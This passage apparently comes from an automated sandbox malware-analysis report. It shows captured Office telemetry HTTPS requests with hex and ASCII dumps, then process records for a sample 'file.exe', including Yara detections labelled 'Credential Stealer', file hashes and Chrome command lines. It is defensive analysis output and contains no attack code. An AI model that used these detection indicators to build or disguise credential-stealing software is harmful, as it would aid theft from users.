                                                                                                                                                                                                2024-11-23 15:55:00 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                146192.168.2.44997813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:59 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:55:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:55:00 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                x-ms-request-id: 23fc118c-601e-0084-474e-3c6b3f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155500Z-15b8b599d8885prmhC1TEBsnkw00000003a0000000005zqs
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:55:00 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                147192.168.2.44998113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:55:01 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:55:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:55:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                x-ms-request-id: c87fa586-301e-0052-7045-3c65d6000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155501Z-174c587ffdfx984chC1TEB676g000000035g000000007yg2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:55:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                148192.168.2.44998213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:55:01 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:55:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:55:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1406
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                x-ms-request-id: f92b14d5-201e-003c-1815-3d30f9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155501Z-178bfbc474b9xljthC1NYCtw9400000004gg00000000gy0q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:55:02 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                149192.168.2.44998313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:55:01 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:55:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:55:02 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1369
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                x-ms-request-id: 4e23fa7b-901e-0048-7ba0-3bb800000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155502Z-15b8b599d88vp97chC1TEB5pzw000000033000000000d0x0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:55:02 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:10:52:59
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                Imagebase:0x750000
                                                                                                                                                                                                File size:1'864'192 bytes
                                                                                                                                                                                                MD5 hash:15A0533DBBD05872ADE7DB7AF70E20F0
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1793640504.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792814886.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1794021961.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792784411.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792640692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762884900.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1815422252.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1762774652.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1816137856.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792979649.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1840994528.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:10:53:35
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:10:53:36
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1992,i,4390689463259841264,4189081711849451839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:10:53:39
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:10:53:39
                                                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,11718227575472931439,6391638913668732061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                No disassembly